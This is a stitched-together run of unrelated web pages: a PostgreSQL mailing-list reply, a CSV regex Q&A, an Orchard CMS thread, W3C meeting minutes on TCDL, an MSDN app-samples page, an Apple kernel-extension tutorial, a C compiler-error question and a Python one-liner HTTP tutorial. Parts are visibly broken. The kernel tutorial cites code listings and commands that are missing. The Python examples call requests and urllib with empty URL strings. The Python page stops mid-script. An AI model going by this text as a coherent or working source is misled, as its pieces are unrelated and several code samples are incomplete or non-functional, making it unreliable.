> This is only true if we change the extension templates to be shared
> catalogs, which they aren't today..

I agree with you about that -- I don't like per-DB templates. I guess the challenge is that we might want to use namespaces to support user-installable extensions, and namespaces reside within a DB. But I think we can find some other solution there (e.g. user names rather than schemas), and per-DB templates are just not a good solution anyway.

Regards,
Jeff Davis

--
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
https://www.mail-archive.com/pgsql-hackers@postgresql.org/msg227519.html
I have this code to split a complicated CSV file into chunks. The hard bit is that commas may also appear within "" and thus those must not be split on. The regex I am using to find commas not within "" works fine:

comma_re = re.compile(r',(?=([^"]*""[^"]*"")*[^"]*$)')

import re
test = 'Test1,Test2,"",Test3,Test4"",Test5'
comma_re = re.compile(r',(?=([^"]*""[^"]*"")*[^"]*$)')
print comma_re.split(test)

This prints:

['Test1', 'Test2,"",Test3,Test4""', 'Test2', '"",Test3,Test4""', '"",Test3,Test4""', None, 'Test5']

The output I want is:

['Test1', 'Test2', '"",Test3,Test4""', 'Test5']

---

(?<!"),(?![^",]+")|,(?=[^"]*$)

Will work for the example you gave, although it won't work if the input differs from that format.

input = 'Test1,Test2,"",Test3,Test4"",Test5'
output = re.split(r'(?<!"),(?![^",]+")|,(?=[^"]*$)', input)
print(output)
# ['Test1', 'Test2', '"",Test3,Test4""', 'Test5']

---

You should really be using a CSV parser for this. If you can't for some reason - just do some manual string processing, going through character by character and splitting when you see a comma, unless you have recognised you are in a quoted string. Something like the following:

input = 'Test1,Test2,"",Test3,Test4"",Test5'

insideQuoted = False
output = []
lastIndex = 0
for i in range(0, len(input)):
    if input[i] == ',' and not insideQuoted:
        output.append(input[lastIndex: i])
        lastIndex = i + 1
    elif input[i] == '"' and i < len(input) - 1 and input[i + 1] == '"':
        insideQuoted ^= True
    elif i == len(input) - 1:
        output.append(input[lastIndex: i + 1])
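For standard CSV quoting (where quotes wrap whole fields), the stdlib csv module already handles embedded commas. Note it will not reproduce the exact output above, because that input uses doubled quotes inside unquoted fields rather than standard CSV quoting — this is just a sketch of the recommended approach:

```python
import csv
import io

line = 'a,"b,c",d'                       # a conventionally quoted CSV record
row = next(csv.reader(io.StringIO(line)))
print(row)                               # ['a', 'b,c', 'd']
```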
https://codedump.io/share/f2prnzPv9HLg/1/regex-avoid-quotrest-of-stringquot-split-results
CodePlex — Project Hosting for Open Source Software

My role on this project is essentially UI layer, limited MVC3 experience...so far.

Results: The correct view is being injected into the page as expected but none of the values appear to be populating? Any ideas, ran through the debugger but really doesn't help me if I have limited MVC3 at this point. Any ideas of why my vars may not be populating?

NOTE: var contentTypeClassName Value = "w-s-capability" (is this significant to my issue?) Thanks in advance. (ContentType View Code Below)

@using Orchard.Utility.Extensions;
@{
    Layout.Title = Model.Title;
    var contentTypeClassName = ((string)Model.ContentItem.ContentType).HtmlClassify();
}
<div class="SkillsSmartsBox" style="border-top:1px solid #666666; width:300px;">
    <div class="boxLeft">
        <p><span class="SSViewD"> </span></p>
    </div>
    <div class="boxRight">
        <h2 class="para title1"><span class="panelTitleD">@Model.CapabilityTitle</span></h2>
        <p class="skilldescrip">@Model.CapabilitySubhead </p>
        <a href="#" class="collapsePanel">-</a>
        @Model.Body
    </div>
    <div class="clear"></div>
</div>

I think you need to go through the content item and the part. Use Shape Tracing to determine how to get to your properties. I'd guess something like Model.ContentItem.WSCapability.CapabilityTitle.

Well I installed the Shape Tracing module, but it certainly is not behaving as I would have hoped. Upon launch I had many .js errors, so my assumption was that some of my jQuery includes at document level were stepping on the Shape Tracing mod and its jQuery, so I commented out my references in the document, but I'm still having .js issues with this module. I do get some functionality now, but it's still almost unusable for all practical intents. I certainly have no editing capabilities as the documentation states, but do see some limited model information. Using IE8/FF4. Any ideas or posts that may be helpful in resolving this issue that you are aware of? Done some searching but nothing seems to be relevant so far.
I can certainly see how this module might be helpful (if I could get it to work). I'll take any links you may be able to provide. Thanks.

Reply: When you include jQuery, do you do it with @Script.Require("jQuery")? Because that's how you should do it to avoid conflicts.

Reply: In Document.cshtml, I have been commenting these out; is this wrong?

    /* Global includes for the theme */
    Script.Include("jquery-1.4.4.min.js").AtHead();
    Script.Include("jquery.collapser.min.js").AtHead();
    Script.Include("jquery.juitter.js").AtHead();
    Script.Include("system.js").AtHead();
    Script.Include("Capabilities.js").AtHead();

So to your point, I should change my include references to follow the syntax above in my Document.cshtml file?

Reply: I'm saying the way you're including jQuery is wrong. Orchard comes with its own version of jQuery, which some of the core modules rely on. There's a system of named resources, so instead of including your own copies of the files you use a centralized resource which everything has access to. This means your website has to access fewer files, namespace conflicts are avoided, and you always get the latest version when Orchard is updated. The correct syntax is:

    @Script.Require("jQuery").AtHead();

You can look at ResourceManifest.cs in the Orchard.jQuery module to see all the other scripts that are already available. You should also use the resource manifest name if one is available; if not, you can implement your own resource manifest, and that script will then also be available for other modules or themes that use yours.

Reply: Roger that, I think I know what we're talking about now. I inherited some of this framework; I'm just the UI guy... and sometimes developer guy (drinking from the firehose). Thanks.
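Putting the advice from the thread together, the include block in Document.cshtml would end up looking roughly like this. Only the jQuery line is changed to Script.Require, since the thread confirms only that manifest name; whether the other scripts have manifest entries to Require is an open question, so they stay as plain local includes in this sketch:

```
@{
    Script.Require("jQuery").AtHead();
    Script.Include("jquery.collapser.min.js").AtHead();
    Script.Include("jquery.juitter.js").AtHead();
    Script.Include("system.js").AtHead();
    Script.Include("Capabilities.js").AtHead();
}
```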
https://orchard.codeplex.com/discussions/260822
Agenda
See also: IRC log

resolution: no objection on the global structure of TCDL

CV: issues in the metadata?
CS: in BenToWeb we used DC terms of the year 2002 (previous version); it has been changed as of January
... we can now use dc:date and dc:description
CV: dc:description is not in the "formalMetadata" section
... can one have markup in dc:description?
CS: yes, can derive any datatype
SAZ: we need to describe the datatype we use, whichever it is (and XSD should be ok)

resolution: no objections to using dc:date (instead of just date), with datatype xs:date

CV: any objections to "Extension"?
SAZ: yes, the extension model is not adequate
CS: want to avoid having extension all over the place, just one single point of extension
SAZ: don't see the benefit of choosing this model, could equally well have parsers simply ignore elements and attributes they don't know
CS: this is one way of doing it
SAZ: agree, philosophical discussion. what is the group preference?
CI: agree with SAZ, no point of restricting the extension model
CR: no point of restricting the extension model
SAZ: just to be clear, both methods provide a way of extending the core vocabulary
CS: the current proposal is to extend at the end of each element at a well-defined extension point
VE: not sure which method is better. the method used in BenToWeb proved useful but there may be a better approach too
CV: both methods work, prefer to keep it as is
... on the one hand SAZ and CI wanted to restrict the language, and now taking a liberal approach
CI: we have a specific focus, so don't need an extension model
... once we have a stable language, we won't need extension
... but if you insist on having an extension model, then prefer to have it as open as possible
SAZ: agree we have a specific focus so propose to have as small a vocabulary as possible
SAZ: on the other hand, need to be as flexible as possible for the future
... for example with EARL and TCDL
CV: what is the resolution?
do we add more extension points?
SAZ: what is the problem of not defining extension points and just ignoring unknown elements/attributes
... note, this is not the BenToWeb spec, just the convention of this TF
CS: it is good to be flexible but comes at the cost of accurate validation
... also, any added elements should be in a separate namespace
SAZ: agree, not good practice to modify someone else's schema
CV: we expect the extensions to be content negotiation (HTTP request/response) and pointers, not sure we need others
SAZ: for example, if you build a parser for the current TF vocabulary, it understands dc:creator and a bunch of other elements
... however, if you feed it metadata from the BenToWeb project
... which also contains additional elements such as dc:contributor
... validation will fail and it will reject the metadata
... even though dc:creator information is also in the BenToWeb metadata files
... if the parser would simply ignore unknown elements like dc:contributor, then it could filter out the information it needs
CV: two options - 1) leave it as it is, or 2) add more extension points
CS: add more points where we expect we may need them
SAZ: 3rd option is to tell parsers to simply ignore elements or attributes they don't know
CS: then you can extend anything and anywhere
CI: yes, this is how many vocabularies are defined, like HTML etc.
CV: this makes validation messy, not really the concept of XMLS
SAZ: there are certain constraints, like cardinality
CS: the new elements will be from different namespaces
<Christophe> <xs:any
CS: this will allow the core vocabulary to be validated, and additional elements from other namespaces as extension

resolution: two options - the one described directly above, or the "Extension" method. this is for voting next week
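The `<xs:any` paste from Christophe is cut off in the log. The wildcard being discussed would presumably look something like the following schema fragment, which lets a validating parser strictly check the core vocabulary while laxly accepting elements from foreign namespaces (exact occurrence constraints are an assumption):

```
<xs:any namespace="##other" processContents="lax"
        minOccurs="0" maxOccurs="unbounded"/>
```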
http://www.w3.org/2006/09/19-tsdtf-minutes
Samples for building an app that you can submit to both the Windows Store and the Windows Phone Store. Hundreds of samples from Microsoft to help jumpstart your project quickly.

- Provide search suggestions by using the in-app search control. Key APIs used include AppendQuerySuggestion and SearchBox.
- Create and show multiple views of the app, specify which view to show when the app is activated (using ApplicationViewSwitcher), and create custom animations for switching between views.
- Handle app activation for contact actions through the API of the Windows.ApplicationModel.Activation namespace.
- Get current location info for the user's PC with the Geolocation API.
- Learn how you can connect to OAuth providers such as Facebook, Flickr, Google, and Twitter using the WebAuthenticationBroker class.
- Get the tools and templates you need to start programming DirectX games for the Windows Store with C++.
- Add important features like an app bar, settings and privacy charms, and in-app purchases.
- Walk through the process of porting an OpenGL ES 2.0 graphics pipeline, and look up API mapping to Direct3D 11.1.
- Get articles, overviews, and walkthroughs for porting DirectX 9 games to DirectX 11.1 and the Windows Store.
- Learn about our new app models and the programming languages available to you. Choose a language and gain a solid understanding of new programming concepts.
- Add commonly used features, like file handling or multimedia playback, to your app. The start-to-finish tutorial series helps you refine your app.
- Use the tools included with Visual Studio to make your app the highest quality possible before you submit it to the Windows Store.
- Find the APIs you need in whatever programming language you prefer.
- Learn how to use the Windows Runtime and the Windows Library for JavaScript to build apps.

Ready to increase your reach? Start building apps now for Windows 8.1 Update and Windows Phone 8.1.
The Windows SDK and the Windows Phone 8.1 SDK are components of Visual Studio 2013 Update 2. Microsoft Visual Studio Express 2013 for Windows 8.1 is your tool to build Windows Store apps. It includes the Windows SDK for Windows 8.1, Blend for Visual Studio, and project templates.

Test your app before you submit it for certification and listing in the Windows Store. Learn more about the Windows App Certification Kit.

Walk through Hilo, a complete Windows Store app that shows best practices for developing with JavaScript and HTML or C++ and XAML.

Have an app on another platform that you'd like to bring to Windows? Use these design and development resources to make your job easier.
http://msdn.microsoft.com/en-us/windows/apps/br229519.aspx
This tutorial describes how to create and test a kernel extension (KEXT) for Mac OS X. In this tutorial, you'll create a very simple kernel extension that prints text messages when loading and unloading. The tutorial assumes that you are working in a Mac OS X development environment.

Contents:
- Anatomy of a KEXT
- Roadmap
- Create a new Project using Xcode
- Build the Kernel Extension
- Test the Kernel Extension
- Where to Go Next

Anatomy of a KEXT

To better understand what you're doing, it helps to know what's inside a kernel extension. In Mac OS X, all kernel extensions are implemented as bundles: folders that the Finder treats as single entities. Kernel extensions have names ending in .kext. In addition, all kernel extensions contain the following:

- A property list (plist): a text file (in XML, Extensible Markup Language, format) that describes the KEXT's contents and requirements. This is a required file. A KEXT need contain nothing more than a property list file.
- A KEXT binary: generally, a KEXT has one binary file, but it can have none (locally). However, if it has none, its property list must reference another KEXT and change its default settings. In this way, one KEXT can override or change the behavior of another KEXT. A KEXT binary is also sometimes called a kernel module.
- Optional resources: resources are useful if your KEXT needs to display an icon.

Roadmap

In this tutorial, you'll create, build, load, and run a simple kernel extension. Here are the steps you will follow:

1. "Create a new Project using Xcode"
2. "Build the Kernel Extension"
3. "Test the Kernel Extension"

You'll use the Xcode application to create and build your KEXT. You'll use the Terminal application to type the commands to load and test your KEXT and view the results. If you have never used Xcode before, you may also wish to read Xcode Quick Tour for Mac OS X.

Create a new Project using Xcode

A project is a document that contains all your files and targets. Targets are the things you can build from your project's files.
A simple project has just one target that builds an application. A complex project may contain several targets.

The parts of your project can be found later on your disk. These include the source files as well as the targets (your KEXT). Xcode does not store these files in any special format, so you can view or edit the source files with another editing program if you wish. For now, we recommend using Xcode.

Here's how you'll create the kernel extension project:

1. "Create a Kernel Extension Project"
2. "Implement the Needed Methods"
3. "Edit the KEXT's Settings"

The examples below assume that you will be logging in as an administrator of your machine. The account name in the examples is admin. If you use a different login account, be sure to substitute accordingly. Some of the commands you will be using require root privileges, so you will be using the sudo command. The sudo command allows permitted users (such as an admin user) to execute a given command with root privileges. If you use a different login account, make sure it has administrative access.

Create a Kernel Extension Project

Kernel extensions are created and edited in Xcode, Apple's Integrated Development Environment (IDE).

1. From a Desktop Finder window, locate and launch the Xcode application, found at /Developer/Applications/Xcode. If this is the first time you've run Xcode, you'll see the new user Assistant. The Assistant asks you to make some decisions about your environment. For now, choose the defaults.
2. When you have finished with the Assistant, choose New Project from the File menu.
3. In the New Project Assistant, scroll down to the Kernel Extension section and choose Generic Kernel Extension. Click Next.
4. For the Project Name, enter "HelloKernel". The default location is your home directory; however, if you create many projects, you should make a directory to hold them. Edit the Location to specify a "Projects" subdirectory.
5. When you click Finish, Xcode creates the new project and displays its project window.
Implement the Needed Methods

The new project contains several files already, including a default source file, HelloKernel.c. If necessary, select HelloKernel in the Groups & Files pane. Double-click HelloKernel.c in the detail view to display the source code in a separate editor window. Figure 1 shows where you will find the HelloKernel.c file in the project window.

The default source file does nothing but return a successful status; you'll need to add some additional code. In particular, you will need to implement the initialization and termination code for your KEXT. The default template merely contains suggestions for these routines, as a place for you to begin.

Change the contents of HelloKernel.c to match the code in Listing 1. Save your changes by choosing File > Save. Close the separate editor window by clicking the red close button in the upper left.

Notice that HelloKernel.c includes two header files, sys/systm.h and mach/mach_types.h. Both header files reside in Kernel.framework. When you develop your own KEXT, be sure only to include header files from Kernel.framework (in addition to any header files you create) because only these files have meaning in the kernel environment. If you include headers from outside Kernel.framework, your KEXT might compile, but the functions and services those headers define will not be available in the kernel.

Edit the KEXT's Settings

Your kernel extension contains a property list, or plist, that tells the operating system what your KEXT contains and what it needs. If viewed from a text editor, the property list would be in XML (Extensible Markup Language) format. However, you will be viewing and editing the plist information from within Xcode. By default, Xcode allows you to edit your KEXT's property list as plain XML text in the Xcode editor window. However, it's easier to view and edit the property list file with the Property List Editor application.
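Listing 1 itself did not survive extraction. Based on the HelloKernel_start/HelloKernel_stop routine names the tutorial configures in the build settings and the "KEXT has loaded!" log line it quotes later, the file presumably looked something like this (the unload message is an assumption):

```
#include <sys/systm.h>
#include <mach/mach_types.h>

/* Called when the KEXT is loaded into the kernel. */
kern_return_t HelloKernel_start(kmod_info_t *ki, void *d)
{
    printf("KEXT has loaded!\n");        /* matches the log excerpt quoted later */
    return KERN_SUCCESS;
}

/* Called when the KEXT is unloaded from the kernel. */
kern_return_t HelloKernel_stop(kmod_info_t *ki, void *d)
{
    printf("KEXT will be unloaded.\n");  /* exact wording assumed */
    return KERN_SUCCESS;
}
```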
You can tell Xcode to open property list files using Property List Editor by following these steps:

1. Choose Xcode > Preferences and click the File Types icon. The File Types pane lists all the folder and file types that Xcode handles and the preferred editor for each type.
2. Click the disclosure triangle for file. Then click the disclosure triangle for text.
3. Select text.xml and click Default (Plain Text File) in the Preferred Editor column.
4. Choose External Editor and select Other from the menu that appears.
5. Select Property List Editor in /Developer/Applications/Utilities/Property List Editor and click OK. Now Xcode lists External Editor (Currently Property List Editor) in the Preferred Editor column for text.xml.
6. Click OK to close the Xcode Preferences window.

Now you can edit your KEXT's Info.plist file using Property List Editor:

1. Select HelloKernel in the Groups & Files view.
2. Double-click Info.plist in the Xcode project window. Xcode starts Property List Editor, which displays the Info.plist file. (If Property List Editor displays a second editing window named Untitled, dismiss it by clicking the red close button in the upper left.) If this doesn't work due to a misconfigured project, you can Control-click the name of the file and choose "Open with Finder" from the resulting contextual menu. This should have the same effect.
3. In Property List Editor, click the disclosure triangle next to Root. You should see the elements of the property list file, as shown in Figure 2.
4. Change the value of the CFBundleIdentifier property from the default chosen by Xcode.

Apple has adopted a "reverse-DNS" naming convention to avoid namespace collisions. This is important because all kernel extensions share a single "flat" namespace. By default, Xcode names a new KEXT com.yourcompany.kext.<projname>, where <projname> is the name you chose for your project.
You should replace the first two parts of this name with your actual reverse-DNS prefix (for example: com.apple, edu.ucsd, and so forth). For this tutorial, you will use the prefix com.MyTutorial. On the line for CFBundleIdentifier, double-click com.yourcompany.kext.HelloKernel in the Value field. Double-click yourcompany and change this string to MyTutorial.

The CFBundleVersion property contains the version number of your kernel extension in the 'vers' resource style (for more information on this, see Technical Note TN1132). By default, Xcode assigns new kernel extensions the version number 1.0.0d1. You can change this value if you wish, but your KEXT must declare some version in the 'vers' resource style to be loaded successfully. To change the version value of your KEXT, click the line for CFBundleVersion and double-click 1.0.0d1 in the Value field. For this tutorial, leave the CFBundleVersion property with the default value 1.0.0d1.

Mac OS X requires a KEXT that depends on other loadable extensions or on in-kernel components to declare its dependencies in its plist. This information must be contained in the OSBundleLibraries dictionary at the top level of the plist. You need to determine which loadable extensions or in-kernel components your KEXT depends on. You should examine the #include directives in your kernel extension's code and find the corresponding KEXTs in "Kernel Extension Dependencies." In this tutorial, "HelloKernel" includes sys/systm.h and mach/mach_types.h, so you will create an entry for com.apple.kernel.bsd and an entry for com.apple.kernel.mach.

1. Click the line for OSBundleLibraries and click the disclosure triangle at the beginning of the line. The button previously labeled New Sibling should change to New Child. If not, check to be sure the disclosure triangle next to OSBundleLibraries is pointing down.
2. Click the button that now says New Child (as soon as you do, it will change back to New Sibling).
A new item will appear below OSBundleLibraries. Change the name from New item to com.apple.kernel.bsd. Double-click the value field and enter 6.9.9.

3. Click the New Sibling button and change the name from New item to com.apple.kernel.mach. Double-click the value field and enter 6.9.9.
4. Save your changes by choosing File > Save from the Property List Editor menu.

You won't be making any more changes to your KEXT's Info.plist file in this tutorial, so you can quit the Property List Editor application and return to Xcode by choosing Property List Editor > Quit Property List Editor.

Xcode also allows you to modify or create build settings for your KEXT. These settings define information that will be compiled into the kernel extension's executable.

1. On the left, in the Groups & Files view, click the disclosure triangle next to Targets and select HelloKernel (you don't have to click the disclosure triangle next to HelloKernel).
2. Click the Get Info button in the toolbar (it's the round blue button with an "i" in the middle).
3. Select the Build view and scroll down to the bottom of the Customized Settings list.
4. Change the name of the module from the default chosen by Xcode (the value of the MODULE_NAME setting). Click the line for MODULE_NAME and double-click com.yourcompany.kext.HelloKernel in the Value field. Double-click yourcompany and change this string to MyTutorial. Be sure that the MODULE_NAME value matches the value of the CFBundleIdentifier you entered in your kernel extension's Info.plist file, or your KEXT will not run.

The MODULE_START and MODULE_STOP variables contain the names of your KEXT's initialization and termination routines. Be sure that these variables have the values used in your HelloKernel.c file. That is, for this tutorial, be sure these variables have the values HelloKernel_start and HelloKernel_stop, respectively.
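After the OSBundleLibraries steps above, the dependency section of Info.plist should contain something like the following fragment; the keys and version strings are exactly the ones entered above, while the surrounding layout is assumed:

```
<key>OSBundleLibraries</key>
<dict>
    <key>com.apple.kernel.bsd</key>
    <string>6.9.9</string>
    <key>com.apple.kernel.mach</key>
    <string>6.9.9</string>
</dict>
```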
If you changed the names of the initialization and termination routines when entering the code in the previous section, make sure that the values for these variables match the names you used! Otherwise, your KEXT will not run.

The value of the MODULE_VERSION variable is in the 'vers' resource style and must be numerically identical to the CFBundleVersion value in the kernel extension's Info.plist file, or your KEXT may not load. For this tutorial, make sure the MODULE_VERSION variable has the value 1.0.0d1.

Build the Kernel Extension

Here's how you'll build the kernel extension:

- "If There Were No Errors"
- "Build the Project Again"

Click the Build button in the upper left corner of the editor window, or select Build from the Build menu. The Build button looks like a hammer and is illustrated in Figure 3. If Xcode asks you whether to save some modified files, select all the files and click "Save All". Figure 4 shows the Save dialog.

Xcode starts building your project. It stops if it reaches an error in the code.

If you made any errors typing in the code, Xcode will stop and show you the errors in both the editor window (if you haven't closed it) and the main project window. In the project window, click the disclosure triangle next to Errors and Warnings in the Groups & Files view to reveal the files that contain errors. If you select a file listed under Errors and Warnings, Xcode lists the errors in that file, each accompanied by a short description of the problem. Double-click the file name to open an editor window and edit the source code. The source code with the error will appear in the editing window, as shown in Figure 5. You can edit the source code inside the editing window. Correct the error, save your changes, and build the project again.

If you didn't have any errors, you can insert one so that you can try out the error-handling facility. Try removing the semicolon at the end of one of the lines of code, as shown in Listing 2 (Listing 2: HelloKernel.c with error). Click the Build button.
If Xcode asks you whether to save some modified files, select all the files and click "Save All". Xcode starts building your project again. If there is an error, fix the error as described above. Otherwise, if the build succeeds, you can move on to loading the extension.

Test the Kernel Extension

This section shows how to test the kernel extension. You'll load your KEXT with the kextload command, you'll use the kextstat command to see that it's loaded, and finally, you'll unload your KEXT from the kernel with the kextunload command. You'll use the Terminal application to type the commands to load and unload your KEXT. You'll view the results as they are written to the system log file, /var/log/system.log.

Note: This tutorial uses the "%" prompt when it shows the commands you type in the Terminal application. This is the default prompt of the tcsh shell. If you're using a different shell, you may see a different prompt. For example, the prompt in the bash shell, which is the default shell in Mac OS X version 10.3, is "$".

Here's how you'll test your KEXT:

- "Getting Root Privileges"
- "Start the Terminal Application"

To use the kextload and kextunload commands you must have root or superuser privileges. Instead of logging in as root, for this tutorial you will use the sudo command, which gives permitted users the ability to execute a given command as root. By default, Mac OS X allows admin and root users to use the sudo command, so make sure you are currently logged in to an admin account before using sudo. An admin user is a user who has "Allow user to administer this computer" checked in the Security view of the Accounts system preference.

Start the Terminal application:

1. From a Desktop Finder window, locate and launch the Terminal application, found at /Applications/Utilities/Terminal.
2. To view the system log file, enter the following command at the Terminal prompt:

       tail -f /var/log/system.log

3. Open a second window in the Terminal application. Choose File > New Shell from the Terminal menu.
Position this window so that you can view both windows easily. You will load your KEXT from the second window.

In the second Terminal window, move to the directory that contains your KEXT. Xcode stores your KEXT in the Debug folder of the build directory of your project location (unless you've set a different location for build products using Xcode's Preferences dialog). Use the cd command to move to the appropriate directory.

This directory contains your KEXT. You can use the ls command to view the contents of this directory. Your KEXT should have the name HelloKernel.kext. Note that this name is formed from the project name and a suffix, .kext.

Important: For purposes of packaging, distribution, and installation, the filename of the KEXT (apart from the suffix) does not matter. However, the name of the KEXT binary (stored in the KEXT's property list) should be unique, using the recommended "reverse-DNS" naming convention.

From a Desktop Finder window, a KEXT appears as a single file (look for it from the Desktop if you like). From the Terminal application, however, a KEXT appears as a directory. The KEXT directory contains the contents of your KEXT, including the plist (Contents/Info.plist) and the KEXT binary (Contents/MacOS/HelloKernel). You can view the contents of the KEXT directory with the find command.

You are now ready to load and run (and then unload) your KEXT. You should not change the ownership and permissions of any of your KEXT files in your own directory, because you will no longer be able to save them after working on them. For this tutorial, you will instead use the sudo command to copy the KEXT (HelloKernel.kext) to the /tmp directory, and load and test it from there. At the prompt, you'll use the cp -R command with the sudo command to copy your KEXT to /tmp.
The cp command copies files from one place to another, and the -R option tells cp to copy a directory and its entire subtree (like HelloKernel.kext). When prompted for a password, enter your admin password. (Note that nothing is displayed as you type the password.)

Warning: If you use tab-completion to avoid typing all of HelloKernel.kext, you'll get a "/" after the KEXT name. Be sure to delete this slash before you press Return. If you don't, the cp command will copy only the contents of the HelloKernel.kext directory to /tmp, instead of copying the directory and its entire subtree.

Check the ownership and permissions of your KEXT by moving to the /tmp directory and using the ls -l command. The -l makes the ls command display extra information about the files in a directory.

From the /tmp directory, use the kextload command with the sudo command; this loads your KEXT and runs its initialization (start) function. Note that you may not have to re-enter your password this time. This is because you're allowed to continue to use sudo for a short period (usually about 5 minutes) without reauthenticating. The -v option is optional; it makes kextload provide more verbose information.

In the other Terminal window, view the system log. In a few moments, a line reporting the load will appear.

Use the kextstat command to check the status of the KEXT. This command displays the status of all dynamically loaded KEXTs. You'll see several lines of output, including a line for your KEXT at the end.

Unload the KEXT binary: use the kextunload command with the sudo command. This command unloads your KEXT and runs its termination (stop) function. Note that you may have to enter your admin password this time if it's been more than a few minutes since the last time you entered your password.

View the system log again. In a few moments, several lines reporting the unload will appear. Finally, stop the system log display.
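The individual command examples were lost in extraction. Pulling the steps above together, the whole session might look roughly like this; the build path is inferred from the project location chosen earlier, the flags follow the text's descriptions, and the % prompt follows the tutorial's stated convention:

```
% cd ~/Projects/HelloKernel/build/Debug
% sudo cp -R HelloKernel.kext /tmp
% cd /tmp
% ls -l
% sudo kextload -v HelloKernel.kext
% kextstat
% sudo kextunload HelloKernel.kext
```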
The tail -f command you used to view the system log will continue to run until you stop it. In the Terminal window displaying the system log, press the Control key and the C key at the same time.

As an alternative to the Terminal application, you can load and test your KEXT from console mode. In console mode, all system messages (such as this kernel extension's message "KEXT has loaded!") are written directly to your monitor screen. Messages appear much more quickly than when they are written to the system log file. However, you should keep in mind that console mode is not as flexible as the Terminal application. There are no windows, you cannot view your code in Xcode or run other applications at the same time, and you cannot use copy or paste.

To use console mode, follow these steps:

1. Log out of your account. From the Desktop, choose Log Out from the Finder menu.
2. From the login screen, log in to console mode. Type >console as the user name, leave the password blank, and press Return. Be sure to include the > character at the beginning of the name. The screen turns black and looks like an old ASCII "glass terminal". This is console mode.
3. At the prompt, log in to your admin account.
4. Move to the directory that contains your KEXT binary, using the cd command.
5. Follow the instructions given in "Load the KEXT Binary." Remember that the console messages will come directly to your screen; you do not need to view the system log file.
6. When you have finished, log out of console mode by entering the command logout.

Where to Go Next

Congratulations! You've now written, built, loaded, and unloaded your own kernel extension. In the next tutorial in this series, "Hello I/O Kit: Creating a Device Driver With Xcode," you'll learn how to create a device driver, a special kind of KEXT that allows the kernel to interact with devices. If you're interested, you can use the man command to read the manual pages for kextload, kextstat, and kextunload.
For example, from a Terminal window, enter the command:

    man kextload

More information about the 'vers' resource can be found in the "Finder Interface" chapter of Inside Macintosh: Files. Additional useful reference material can be found in Core Foundation Documentation. Look here for documentation about Bundles, Property Lists, Collections (such as Dictionaries), and more.

As you become more experienced in KEXT development, you should also read the articles in this document that cover more advanced topics, such as how to declare dependencies so that your KEXT targets the appropriate version of Mac OS X. The following articles provide more information on KEXT-related topics:

- "Kernel Extension Dependencies"
- "Kernel Extension Ownership and Permissions"

Last updated: 2007-10-31
http://developer.apple.com/documentation/Darwin/Conceptual/KEXTConcept/KEXTConceptKEXT/hello_kext.html
What is wrong with this? Can't figure it out... perhaps the square sign I'm using is the wrong square sign? The program isn't done, but I thought I'd check that first part, and I keep getting the error.

Code:

    #include <stdio.h>

    int main ()
    {
        double m;
        double n;
        double side1;
        double side2;
        double hypo;

        printf ("Enter the side of n\n");
        scanf ("%lf", &n);
        printf ("Now enter the side of m\n");
        scanf ("%lf", &m);

        side1 = m^2 - n^2;
        printf ( "Side 1 is" );
        printf ("%lf", side1);

        return 0
    }

The compiler error:

    15 C:\Documents and Settings\Emir\Desktop\C\Class\triangle.c invalid operands to binary ^
http://cboard.cprogramming.com/c-programming/69618-invalid-operands-binary-%5E-printable-thread.html
You may already know about Python's capability to create a simple web server in a single line of Python code. Old news. Besides, what's the point of creating a webserver that only runs on your machine? It would be far more interesting to learn how to access existing websites in a single line of code. Surprisingly, nobody talks about this in the Python One-Liners community. Time to change it! This tutorial shows you how to perform simple HTTP GET and POST requests to an existing webserver.

Problem: Given the URL location of a webserver serving websites via HTTP, how do you access the webserver's response in a single line of Python code?

Example: Say, you want to accomplish the following:

    url = ''
    # ... Magic One-Liner Here...
    print(result)
    # ... Google HTML file:
    '''
    <!doctype html><html itemscope="" itemtype="" lang="de"><head><meta content="text/html; charset=UTF-8" http-<meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title>...
    '''

You can try it yourself in our interactive Python shell.

Exercise: Does this script download the complete source code of the Google.com website?

Let's learn about the three most important methods to access a website in a single line of Python code, and how they work!

Method 1: requests.get(url)

The simplest one-liner solution is the following:

    import requests; print(requests.get(url = '').text)

Here's how this one-liner works:

- Import the Python library requests, which handles the details of requesting the websites from the server in an easy-to-process format.
- Use the requests.get(...) method to access the website, and pass the URL '' as an argument so that the function knows which location to access.
- Access the actual body of the GET request (the return value is a response object that also contains some useful meta information, like the file type).
- Print the result to the shell.

Note that the semicolon is used to one-linerize this method.
This is useful if you want to run this command from your operating system's terminal:

python -c "import requests; print(requests.get(url = '').text)"

The output is the desired Google website:

'''
<!doctype html><html itemscope="" itemtype="" lang="de"><head><meta content="text/html; charset=UTF-8" http-<meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title>...
'''

Note that you may have to install the requests library with the following command in your operating system's terminal:

pip install requests

A similar approach works if you want to issue a POST request:

Method 2: requests.post(url)

What if you want to post some data to a web resource? Use the post method of the requests module! Here's a minimal one-liner example of the requests.post() method:

import requests as r; print(r.post('', {'key': 'val'}).text)

The approach is similar to the first one:

- Import the requests module.
- Call the r.post(...) method.
- Pass the URL '' as the first argument into the function.
- Pass the value to be posted, in our case a simple key-value pair in a dictionary data structure, as the second argument.
- Access the body via the text attribute of the returned Response object.
- Print it to the shell.

Method 3: urllib.request

A recommended way to fetch web resources without third-party packages is the standard library's urllib.request module. Its urlopen() function also works as a simple one-liner to access the Google website in Python 3:

import urllib.request as r; print(r.urlopen('').read())

It works similarly to before: urlopen() returns a response object whose read() method yields the body of the server's response. We're cramming everything into a single line so that you can run it from your OS's terminal:

python -c "import urllib.request as r; print(r.urlopen('').read())"

Congrats! You now have mastered the art of accessing websites in a single line of Python code. If you're interested in boosting your one-liner power, have a look at my new book!
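All three one-liners above need a live server to talk to. One way to exercise them without touching the network is to start Python's built-in http.server locally and point urllib.request at it. The handler below is a made-up stand-in for illustration, not part of the tutorial's examples:

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class EchoHandler(BaseHTTPRequestHandler):
    """Tiny illustrative handler: answers GET with a fixed page
    and POST by echoing the posted body back."""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<html>hello</html>")

    def do_POST(self):
        length = int(self.headers["Content-Length"])
        body = self.rfile.read(length)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"posted:" + body)

    def log_message(self, *args):
        pass  # silence per-request logging during the demo

# Port 0 asks the OS for any free port.
server = HTTPServer(("127.0.0.1", 0), EchoHandler)
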